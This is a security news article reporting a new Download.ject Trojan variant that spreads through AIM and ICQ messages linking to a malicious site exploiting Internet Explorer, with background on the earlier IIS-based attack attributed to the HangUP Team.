Article

New AIM Trojan steals financial data

Bill Brenner

A new variant of Download.ject is in the wild, using instant messaging to spread. Like the first strain, this Trojan horse is designed to open backdoors and steal financial data, according to PivX Solutions. The Newport Beach, Calif.-based security firm was still analyzing the scope of the threat Thursday afternoon.

"This one has most of the characteristics of the first Dowload.ject," said Thor Larholm, senior security researcher with PivX. "The difference is that this one uses instant messaging to spread. If you receive the message and click the link, you're infected. Like the first attack, this one also appears to be financially motivated."

Larholm said it arrives as a harmless-looking instant message on AIM or ICQ that reads, "My personal home page http://XXXXXXX.X-XXXXXX.XXX/." Once the user clicks on this link Internet Explorer opens a malicious Web site that infects the user through several Internet Explorer vulnerabilities. The first thing users with infected machines will notice is a modified home page and search pane in the browser. In place of the user's preferred home page is a site called TargetSearch and several browser windows displaying adult advertisements and referral links. PivX has notified antivirus vendors so they can create signatures for the threat, Larholm said.

The first Download.ject attack in June compromised machines using Windows Internet Explorer and Internet Information Services 5.0 (IIS). Microsoft concluded

    Requires Free Membership to View

the assault was a targeted, manual attack by individuals or entities towards a specific server. The Trojan used compromised sites to append JavaScript to the bottom of Web pages. When executed, the JavaScript accesses a file hosted on another server believed to contain malicious code that could affect the end user's system.

The HangUP Team, a for-profit malicious code group from Russia, is believed responsible for the first Download.ject and for the recent rash of Korgo worms that attacked the LSASS vulnerability Microsoft outlined in Security Bulletin MS04-011. Experts believe the goal of the attack was to deliver malicious code to visitors of an affected Web site that could be used to steal credit card and other information that would then be sold to organized identity theft groups.

It's unclear if the HangUP Team is behind the latest variant.


There are Comments. Add yours.

 
TIP: Want to include a code block in your comment? Use <pre> or <code> tags around the desired text. Ex: <code>insert code</code>

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
Sort by: OldestNewest

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to: